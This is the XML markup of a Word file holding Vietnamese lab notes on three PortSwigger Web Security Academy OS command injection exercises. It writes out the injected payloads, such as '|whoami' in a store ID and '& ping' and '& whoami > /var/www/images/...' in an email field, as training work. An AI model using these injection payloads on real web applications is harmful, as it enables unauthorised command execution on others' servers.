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6011" w14:textId="77777777" w:rsidR="009B1843" w:rsidRDefault="009B1843" w:rsidP="009B1843">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1843">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>OS command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3118A6BB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19C13246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(Mục tiêu lab / cái bạn muốn chứng minh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B25D3B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0CAF63F3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3F9A07A4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323F86C" w14:textId="77777777" w:rsidR="00FB4021" w:rsidRPr="00821136" w:rsidRDefault="00FB4021" w:rsidP="00FB4021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1 (curl / browser URL / sqlmap command...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FDF28A" w14:textId="77777777" w:rsidR="00FB4021" w:rsidRPr="00821136" w:rsidRDefault="00FB4021" w:rsidP="00FB4021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5A4E97E2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425ADB1" w14:textId="77777777" w:rsidR="00FB4021" w:rsidRPr="00821136" w:rsidRDefault="00FB4021" w:rsidP="00FB402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1 — làm gì.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04852B0F" w14:textId="77777777" w:rsidR="00FB4021" w:rsidRPr="00821136" w:rsidRDefault="00FB4021" w:rsidP="00FB402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2 — làm gì.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D18411" w14:textId="77777777" w:rsidR="00FB4021" w:rsidRPr="00821136" w:rsidRDefault="00FB4021" w:rsidP="00FB4021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17C43AB3" w14:textId="77777777" w:rsidR="00FB4021" w:rsidRPr="00821136" w:rsidRDefault="00FB4021" w:rsidP="00FB4021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E0C932F" w14:textId="77777777" w:rsidR="00FB4021" w:rsidRPr="00821136" w:rsidRDefault="00FB4021" w:rsidP="00FB4021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Kết quả thấy trong response / DOM / console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237747B8" w14:textId="77777777" w:rsidR="00FB4021" w:rsidRPr="00821136" w:rsidRDefault="00FB4021" w:rsidP="00FB4021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003FF7F8" w14:textId="6E8A92B1" w:rsidR="00FB4021" w:rsidRPr="00FB4021" w:rsidRDefault="00FB4021" w:rsidP="009B184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>(Short reproducible input or URL — giữ an toàn, có thể obfuscate payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081756D1" w14:textId="70619591" w:rsidR="009B1843" w:rsidRPr="009B1843" w:rsidRDefault="009B1843" w:rsidP="009B1843">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1843">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AB3C2DA" wp14:editId="63894A93">
            <wp:extent cx="5943600" cy="4170045"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="593419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96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A2BC" w14:textId="170E96F5" w:rsidR="009B1843" w:rsidRPr="009B1843" w:rsidRDefault="009B1843" w:rsidP="009B1843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9B1843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9B1843">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>OS command injection, simple case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2095D772" w14:textId="56EEE321" w:rsidR="009B1843" w:rsidRPr="00821136" w:rsidRDefault="009B1843" w:rsidP="009B184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Thực thi được lệnh whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F76FF64" w14:textId="10A21419" w:rsidR="009B1843" w:rsidRPr="00821136" w:rsidRDefault="009B1843" w:rsidP="009B184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9B1843">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>https://0afc006504bed2f6800af446000c00b1.web-security-academy.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0330640B" w14:textId="554463D1" w:rsidR="009B1843" w:rsidRPr="00821136" w:rsidRDefault="009B1843" w:rsidP="009B184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727A9CC3" w14:textId="77777777" w:rsidR="009B1843" w:rsidRPr="00821136" w:rsidRDefault="009B1843" w:rsidP="009B184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4CCC20B" w14:textId="750E8868" w:rsidR="009B1843" w:rsidRPr="00821136" w:rsidRDefault="009B1843" w:rsidP="009B1843">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1843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4993E99A" wp14:editId="5FE9AEBF">
            <wp:extent cx="5943600" cy="2251710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1356250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03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2E3CFEA2" w14:textId="5525259B" w:rsidR="009B1843" w:rsidRPr="00821136" w:rsidRDefault="009B1843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ED0012">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ta injected vào thêm | whoami vào store id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6C2CE6" w14:textId="491FBAEE" w:rsidR="009B1843" w:rsidRPr="00821136" w:rsidRDefault="009B1843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 w:rsidR="00C87694"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270359D5" w14:textId="77777777" w:rsidR="009B1843" w:rsidRDefault="009B1843" w:rsidP="009B1843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2EB53CF8" w14:textId="35BD83F8" w:rsidR="00ED0012" w:rsidRPr="00821136" w:rsidRDefault="00ED0012" w:rsidP="009B1843">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED0012">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="427C831B" wp14:editId="7644A877">
            <wp:extent cx="5943600" cy="2363470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1339678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89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A83B" w14:textId="3803B643" w:rsidR="009B1843" w:rsidRDefault="009B1843" w:rsidP="009B1843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ED0012" w:rsidRPr="00ED0012">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>productId=2&amp;storeId=1|whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28007B83" w14:textId="1F3DD444" w:rsidR="00C87694" w:rsidRDefault="00C87694" w:rsidP="009B1843">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8769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204F5D1" wp14:editId="4399B0DA">
            <wp:extent cx="5943600" cy="4658360"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1290084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845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DA01" w14:textId="5EC2A949" w:rsidR="00C87694" w:rsidRPr="00C87694" w:rsidRDefault="00C87694" w:rsidP="00C876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C87694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C87694">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Blind OS command injection with time delays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11/10/2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35171D4C" w14:textId="1D63E636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 xml:space="preserve">Dùng Os command để khiến cho trang web dừng 10 giây </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CBCAA5" w14:textId="7CB1D15B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C87694">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>https://0aab00410422fea080bd583600c70042.web-security-academy.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F29F434" w14:textId="13C4E72F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BurpSuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A6E0B" w14:textId="77777777" w:rsidR="00C87694" w:rsidRDefault="00C87694" w:rsidP="00C876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DE8496A" w14:textId="12F59D5C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C87694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3A28F56" wp14:editId="70318F2A">
            <wp:extent cx="5943600" cy="2547620"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="396823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38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2E20" w14:textId="77777777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08C3268" w14:textId="18AF8F81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 xml:space="preserve">Ta inject them đoạn </w:t>
      </w:r>
      <w:r w:rsidRPr="00C87694">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>%26+ping+-c+10+127.0.0.1+%26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào field email </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D8C39" w14:textId="6551760B" w:rsidR="00C87694" w:rsidRPr="00821136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kết quả quan sát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6819594F" w14:textId="77777777" w:rsidR="00C87694" w:rsidRDefault="00C87694" w:rsidP="00C87694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5C299D9" w14:textId="6708A1DA" w:rsidR="00C87694" w:rsidRPr="00C87694" w:rsidRDefault="00C87694" w:rsidP="00C87694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sẽ thấy nó bị delay 10s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275F3468" w14:textId="5ADD1E9E" w:rsidR="00C87694" w:rsidRDefault="00C87694" w:rsidP="00C87694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C87694">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>csrf=YmE00CqgoaBa2FFXWpv92dr5PEff0A6J&amp;name=123&amp;email=123%40gmail.com%26+ping+-c+10+127.0.0.1+%26+&amp;subject=123&amp;message=123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A831B3" w14:textId="5CD4E378" w:rsidR="00A711F2" w:rsidRDefault="00C27153" w:rsidP="00C87694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27153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E274B3B" wp14:editId="1E384A45">
            <wp:extent cx="5943600" cy="4438650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1951776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68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48C0" w14:textId="069355EF" w:rsidR="00A711F2" w:rsidRPr="00855CF7" w:rsidRDefault="00A711F2" w:rsidP="00A711F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855CF7" w:rsidRPr="00855CF7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855CF7" w:rsidRPr="00855CF7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Blind OS command injection with output redirection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855CF7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>11/10/2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4722BFCC" w14:textId="06B8952E" w:rsidR="00A711F2" w:rsidRPr="00821136" w:rsidRDefault="00A711F2" w:rsidP="00A711F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 w:rsidR="00855CF7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Thực hiện được lệnh whoami và xem được file output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B24CAFB" w14:textId="458A7A66" w:rsidR="00A711F2" w:rsidRPr="00821136" w:rsidRDefault="00A711F2" w:rsidP="00A711F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855CF7" w:rsidRPr="00855CF7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>https://0a6000f704683d21807526aa0076005c.web-security-academy.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8BB8CD" w14:textId="071E520E" w:rsidR="00A711F2" w:rsidRPr="00821136" w:rsidRDefault="00A711F2" w:rsidP="00A711F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855CF7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>BurpSuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243D8477" w14:textId="77777777" w:rsidR="00A711F2" w:rsidRDefault="00A711F2" w:rsidP="00A711F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AB551E1" w14:textId="504EA0AF" w:rsidR="00855CF7" w:rsidRPr="00821136" w:rsidRDefault="00855CF7" w:rsidP="00A711F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00855CF7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73772B8B" wp14:editId="3295BEA8">
            <wp:extent cx="5849166" cy="3867690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43204465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44655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25ED" w14:textId="77777777" w:rsidR="00A711F2" w:rsidRPr="00821136" w:rsidRDefault="00A711F2" w:rsidP="00A711F2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6783E5CA" w14:textId="69771210" w:rsidR="00A711F2" w:rsidRPr="00821136" w:rsidRDefault="00A711F2" w:rsidP="00855C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 w:rsidR="00855CF7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta thực hiện việc injected thêm đoạn </w:t>
      </w:r>
      <w:r w:rsidR="00855CF7" w:rsidRPr="00855CF7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>%26+whoami+&gt;+/var/www/images/conmeo.txt+%26</w:t>
      </w:r>
      <w:r w:rsidR="00855CF7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A13576A" w14:textId="0AFEC539" w:rsidR="00A711F2" w:rsidRPr="00821136" w:rsidRDefault="00A711F2" w:rsidP="00855C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 w:rsidR="00855CF7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">sau đó truy cập thông qua đường dẫn </w:t>
      </w:r>
      <w:r w:rsidR="00855CF7" w:rsidRPr="00855CF7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>https://0a6000f704683d21807526aa0076005c.web-security-academy.net/image?filename=conmeo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D5FF6" w14:textId="77777777" w:rsidR="00A711F2" w:rsidRPr="00821136" w:rsidRDefault="00A711F2" w:rsidP="00855CF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Bước 3 — kết quả quan sát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13275422" w14:textId="77777777" w:rsidR="00A711F2" w:rsidRDefault="00A711F2" w:rsidP="00A711F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E4A2E56" w14:textId="28B65A5E" w:rsidR="00855CF7" w:rsidRPr="00821136" w:rsidRDefault="00855CF7" w:rsidP="00A711F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00855CF7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76B58C8E" wp14:editId="1A6FBDC8">
            <wp:extent cx="5943600" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1959523120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3120" name="Picture 1" descr="A computer screen with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625D" w14:textId="77777777" w:rsidR="00855CF7" w:rsidRDefault="00A711F2" w:rsidP="00A711F2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PoC (short):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463E2CCB" w14:textId="7902DB2D" w:rsidR="00A711F2" w:rsidRPr="00FB4021" w:rsidRDefault="00855CF7" w:rsidP="00A711F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00855CF7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>%26+whoami+&gt;+/var/www/images/conmeo.txt+%26</w:t>
      </w:r>
      <w:r w:rsidR="00A711F2" w:rsidRPr="00821136">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22521A04" w14:textId="77777777" w:rsidR="00A711F2" w:rsidRPr="00FB4021" w:rsidRDefault="00A711F2" w:rsidP="00C87694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9F6B80" w14:textId="77777777" w:rsidR="00C87694" w:rsidRPr="00821136" w:rsidRDefault="00C87694" w:rsidP="009B1843">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13AE6EAD" w14:textId="77777777" w:rsidR="00B4178A" w:rsidRPr="009B1843" w:rsidRDefault="00B4178A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B4178A" w:rsidRPr="009B1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8C"/>
    <w:rsid w:val="00074C51"/>
    <w:rsid w:val="003C1EEF"/>
    <w:rsid w:val="00855CF7"/>
    <w:rsid w:val="009B1843"/>
    <w:rsid w:val="00A711F2"/>
    <w:rsid w:val="00B4178A"/>
    <w:rsid w:val="00C27153"/>
    <w:rsid w:val="00C87694"/>
    <w:rsid w:val="00D8048C"/>
    <w:rsid w:val="00ED0012"/>
    <w:rsid w:val="00FB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3679C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DBC60E31-78CD-423D-A813-70DA7477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8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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-11T05:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-11T06:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>